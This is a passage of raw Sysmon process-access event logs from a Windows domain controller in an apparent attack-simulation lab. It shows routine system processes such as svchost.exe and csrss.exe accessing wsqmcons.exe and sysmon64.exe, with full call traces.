C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-001044B90000}","SourceProcessId":"1140","SourceThreadId":"1976","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-001081E50500}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\System32\\wsqmcons.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|c:\\windows\\system32\\UBPM.dll+a711|c:\\windows\\system32\\UBPM.dll+f974|c:\\windows\\system32\\UBPM.dll+cd3c|c:\\windows\\system32\\UBPM.dll+d305|c:\\windows\\system32\\UBPM.dll+dc05|c:\\windows\\system32\\UBPM.dll+e91d|c:\\windows\\system32\\UBPM.dll+e12a|c:\\windows\\system32\\UBPM.dll+dd82|c:\\windows\\system32\\EventAggregation.dll+3e22|c:\\windows\\system32\\EventAggregation.dll+36c9|c:\\windows\\system32\\EventAggregation.dll+332f|c:\\windows\\system32\\EventAggregation.dll+2e28|C:\\Windows\\SYSTEM32\\ntdll.dll+64ed5|C:\\Windows\\SYSTEM32\\ntdll.dll+64bdd|C:\\Windows\\SYSTEM32\\ntdll.dll+64a40|C:\\Windows\\SYSTEM32\\ntdll.dll+45b70|C:\\Windows\\SYSTEM32\\ntdll.dll+2a073|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3921,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2017-5F25-0000-001081E50500}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\System32\\wsqmcons.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2017-5F25-0000-001081E50500}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\System32\\wsqmcons.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3922,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3923,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3924,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3925,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3926,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3927,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:56:07.919","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:56:08","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:56:07","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3928,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:56:07.919\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 